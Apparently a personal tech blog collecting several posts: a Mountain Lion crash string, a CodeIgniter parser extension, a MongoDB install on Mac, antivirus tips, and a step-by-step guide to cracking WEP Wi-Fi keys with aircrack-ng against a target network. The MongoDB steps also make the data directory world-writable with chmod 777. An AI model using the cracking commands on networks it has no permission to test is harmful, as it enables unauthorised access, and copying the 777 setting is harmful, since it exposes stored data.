Crashing a Mac Easily


So… you thought that OSX was the most stable OS ever developed… right? Guess what… you can crash it super easily. Just try the following…

  • Open any OSX app. For instance, Safari.
  • Type in the location bar the following string:  File:///
  • See the crash onscreen?

It’s been reported in OpenRadar, and astonishingly, it’s only affecting the latest incarnation of OSX, Mountain Lion. You can crash Chrome, Safari… and probably, any app you’ve got installed.

What’s all the fuss about? Crashes can be used to get control of the instruction pointer (IP), which is, in layman’s terms, the guy that says what to execute next. Long story short, this could potentially be used to develop an exploit to escalate privileges in the system.

Let’s wait for a patch… 10.8.3 is taking quite a long time to ship.

Extending CodeIgniter Parser to support Objects

I really like CodeIgniter, since it’s super lightweight, and its learning curve is super small. You can build a whole website within just a couple of days, even with database support.

I’ve written myself an e-commerce website in just two weeks, without having previous knowledge of the technology. Now, let’s get to business.

What happens when you’re writing a view (PHP based), and you need to display a variable? Well, you’ve got, essentially, two options. To begin with, you can simply invoke the PHP ‘echo’ routine, by doing something like this:

[cc lang="php"]<?php echo $blog_title; ?>[/cc]

Now, if you wanna keep your code really clean, you can rely on CodeIgniter’s built-in parser. How do you implement it? Super simple:

1. Initialize the Parser Library:

[cc lang="php"]$this->load->library('parser');[/cc]

2. Replace the ‘<?php echo $blog_title; ?>’ routines with the following syntax:

[cc lang="php"]{blog_title}[/cc]

So far so good. Now… here’s something interesting. What happens if you wanna print an object’s property, or the result of an object’s method? Well, CodeIgniter doesn’t support that scenario. It will only work with strings, and with arrays (of strings). So… I’ve extended the library a bit, in order to support printing an object’s properties.

You can download right here my extended version of the parser. We won’t be analyzing the code I’ve written. It’s not complex, and you’re invited to run a diff between the original and my patch.

Now… how do we use it? Simple…

1. Install the sf_parser library

You should copy the ‘sf_parser.php’ file to ‘/application/libraries/sf_parser.php’. That’s it. No more, no less. Simplicity is one of the things I love the most about the CI framework.

2. Initialize the sf_parser library

Instead of initializing the CI’s default parser, we’re gonna need to load our custom library. We can achieve that by doing the following:

[cc lang="php"]$this->load->library('sf_parser');[/cc]

3. Use the new syntax!

The goal of this library is to enable you (the user!) to print any object’s properties, or a getter’s result. Which means that… instead of using the following syntax in your view.php file:

[cc lang="php"]<?php echo $blog->get_title(); ?>[/cc]

You can now do something far more elegant… which looks something like this:

[cc lang="php"]{blog:get_title}[/cc]

If you found it useful… if you found a bug… or if you’ve extended it further, I’d love to hear from you!

Install mongoDB on a Mac!


MongoDB is a NoSQL database, free of charge. The beauty of mongo lies in its schema-less design… you can add and remove fields, without doing ‘alter table’.

Your information gets stored in JSON, which is seriously interesting, especially if you work with iOS / Android apps, and the communications layer works in JSON.

So… fire up a browser, and head to this URL. Assuming you’re running OSX (like me!), you’d need the Mac binary, which is about 60 megabytes.

Preferably, you’ll need to download the 64-bit executable. The 32-bit version can only address databases up to 2 gigabytes.

Once you’ve got the file, simply double click on it, to get it uncompressed. Assuming that the file is in the downloads folder, let’s move it to a more suitable location.

Launch terminal, and type the following:

[cc lang="bash"]
# Move the extracted folder out of Downloads (writing to /usr/local needs sudo)
cd ~/Downloads/
sudo mv mongodb /usr/local/mongodb
[/cc]

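Mongo stores its databases in the “/data/db” directory, so… we need to create it:

[cc lang="bash"]
# / is owned by root, so these need sudo
sudo mkdir /data
sudo mkdir /data/db
# 777 makes the directory readable and writable by every local account
sudo chmod 777 /data/db
[/cc]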

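Now, let’s add a couple of symbolic links, so you can launch mongo from anywhere in the system:

[cc lang="bash"]
cd /usr/local/bin
# -s creates symbolic links; without it, ln makes hard links
sudo ln -s /usr/local/mongodb/bin/mongod
sudo ln -s /usr/local/mongodb/bin/mongo
[/cc]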

That’s it! You’ve just installed mongo! In order to launch the database, you simply need to type the ‘mongod’ command.

If you wanna launch a command-line client, type ‘mongo’, which should connect to the server, right away.
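The same data directory set up with owner-only permissions instead of 777, as an added example that is not part of the original post. The function names `audit_dbpath` and `harden_dbpath` are made up here, and the demo runs on a scratch directory standing in for /data/db.

```shell
#!/bin/sh
# Added example: check who can reach a MongoDB data directory and tighten it.
# Function names are illustrative; nothing here comes from MongoDB itself.

# Permission string as printed by ls, e.g. "drwxrwxrwx".
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# Classify a data directory by who, besides its owner, can touch it.
audit_dbpath() {
    [ -d "$1" ] || return 2
    case "$(mode_of "$1")" in
        ????????w?) echo "world-writable" ;;  # what chmod 777 produces
        ????------) echo "owner-only" ;;      # what chmod 700 produces
        *)          echo "shared" ;;          # group/other can read or enter
    esac
}

# Create the directory if needed, hand it to the account that will run
# mongod, and remove all group/other access.
# usage: harden_dbpath DIR OWNER   (chown to another user needs root)
harden_dbpath() {
    mkdir -p "$1" && chown "$2" "$1" && chmod 700 "$1"
}

# Demo on a scratch directory (constructed stand-in for /data/db).
demo() {
    scratch=$(mktemp -d) || return 1
    mkdir "$scratch/db" && chmod 777 "$scratch/db"
    echo "before: $(mode_of "$scratch/db") $(audit_dbpath "$scratch/db")"
    harden_dbpath "$scratch/db" "$(id -un)"
    echo "after:  $(mode_of "$scratch/db") $(audit_dbpath "$scratch/db")"
    rm -rf "$scratch"
}

demo
```

With the directory at 700, mongod has to run as the account given as OWNER, since no other account can open it.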

Do Macs need Antivirus?. Yeah, they do!

So… you own an iMac… maybe a MacBook Pro, or maybe you’re one of the lucky owners of a Mac Pro. You’ve been watching ads for the last ten years… you bought it all, and you feel safe just because it’s not Windows… right?

Well… things are not the way they were a couple of years ago. As Apple gained more and more market share, virus developers turned their eyes on our beloved OSX system. Since the Java virtual machine has been found to be buggy… several viruses that affected the Mac have been caught in the wild.

What can we do? Well… there are a couple of things you could do…

1. Enable Mac Gatekeeper

What is the Mac Gatekeeper? Well, the concept is simple. We just close the door to malicious software, by only installing software from trusted sources. Ever wondered why there are no viruses for iPhone? Well… it’s because the iOS ecosystem is a walled garden. By enabling the Gatekeeper, you’d be replicating the same safe environment as iOS has.

In order to enable the Gatekeeper, you need to go to “System Preferences >> Security & Privacy” (in Mountain Lion).

See where it says ‘Allow applications downloaded from’? Make sure you check ‘Mac App Store’ (or Mac App Store + identified devs). ‘Anywhere’ is not recommended.

That way your computer will install software ONLY from trusted sources.

2. Install Mac Antivirus Software

Yes… installing an antivirus will impact your performance slightly. But at the very least, you’ll get to feel safe again. It’s just a feeling, bear that in mind, always!

What antivirus software can you use? Well, you could try AVG for Mac (which is free!), ESET for Mac (paid, but one of the best), and Norton Antivirus for Mac.

3. Install a Firewall

One of the things that make me freak out the most… is not knowing what applications are opening connections with remote servers. So… if you’re paranoid like me, you could simply install a firewall, and validate, process by process, if they really need to access the internet.
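One way to see which processes hold connections to remote servers, using the stock `lsof` tool; this is an added example, not part of the original post. The sample lines, process names and addresses are constructed, and `summarise_connections` and `unexpected_talkers` are names made up here.

```shell
#!/bin/sh
# Added example: list remote endpoints per process from lsof output.
# Live use:  lsof -nP -iTCP -sTCP:ESTABLISHED | summarise_connections

# Constructed sample in lsof's column layout (documentation-range addresses).
sample_lsof() {
    cat <<'EOF'
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
Safari    412 alice  23u  IPv4 0x1a2b      0t0  TCP 192.168.1.20:52311->203.0.113.10:443 (ESTABLISHED)
Safari    412 alice  24u  IPv4 0x1a2c      0t0  TCP 192.168.1.20:52312->203.0.113.10:443 (ESTABLISHED)
Mail      530 alice  11u  IPv4 0x1a2d      0t0  TCP 192.168.1.20:52400->198.51.100.7:993 (ESTABLISHED)
updaterd  777 alice   5u  IPv4 0x1a2e      0t0  TCP 192.168.1.20:52555->192.0.2.44:8080 (ESTABLISHED)
EOF
}

# Read lsof output on stdin; print "process remote-endpoint connection-count".
summarise_connections() {
    awk '
        NR == 1 && $1 == "COMMAND" { next }      # header row
        {
            for (i = 2; i <= NF; i++)            # NAME is the field with "->"
                if (index($i, "->")) {
                    split($i, ends, "->")
                    seen[$1 " " ends[2]]++
                }
        }
        END { for (k in seen) print k, seen[k] }
    ' | LC_ALL=C sort
}

# Print processes with connections that are not on the allowlist ($1,
# space-separated process names as lsof shows them).
unexpected_talkers() {
    allowed=" $1 "
    summarise_connections | while read -r proc remote count; do
        case "$allowed" in
            *" $proc "*) ;;                      # expected, skip
            *) echo "$proc $remote" ;;
        esac
    done
}

sample_lsof | summarise_connections
```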

Hopefully, with this extra software you’ll be able to stay away from trouble. Again… hopefully!

Running airmon-ng in mountain lion!

For those of you who have no clue what all of this is about, Aircrack-ng is a command line tool that allows you to bruteforce WEP and WPA wi-fi password protections.

WEP being the easiest protection to break, and WPA the hardest. The difference? WEP can be broken in… two days, give or take (probably less than that), while WPA could take months… without results! Personally, every time I needed to break a WEP protection, I had to boot a Linux system. If you’re like me, and you’d rather stay in OSX, this is juuuuust for you.

I don’t wanna forget about this, so i’m writing this short guide, right here!

  1. Install Macports.
  2. Install aircrack-ng:[cc lang="bash"]sudo port install aircrack-ng[/cc]
  3. Install the latest Xcode, with the Command Line Tools.
  4. Create the following symlink:[cc lang="bash"]sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport[/cc]
  5. Figure out which channel you need to sniff:[cc lang="bash"]sudo airport -s[/cc]
  6. Open up a terminal and type:[cc lang="bash"]sudo airport en1 sniff [CHANNEL][/cc]
  7. Open up a second terminal and type:[cc lang="bash"]aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE][/cc]

Notes: the capture file ([CAP_FILE]) will be located at /tmp/airportSniff*.cap.
Nice, right?

===========================
Update:

I’ve been having issues while trying to crack a WEP key. I had over 100k IVs… without luck. So I’ve attempted to crack the key with the KoreK algorithm (coded in aircrack-ng). And guess what!! I got the key!! If you ever have the same problem, try this:

[cc lang="bash"]aircrack-ng -K -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE][/cc]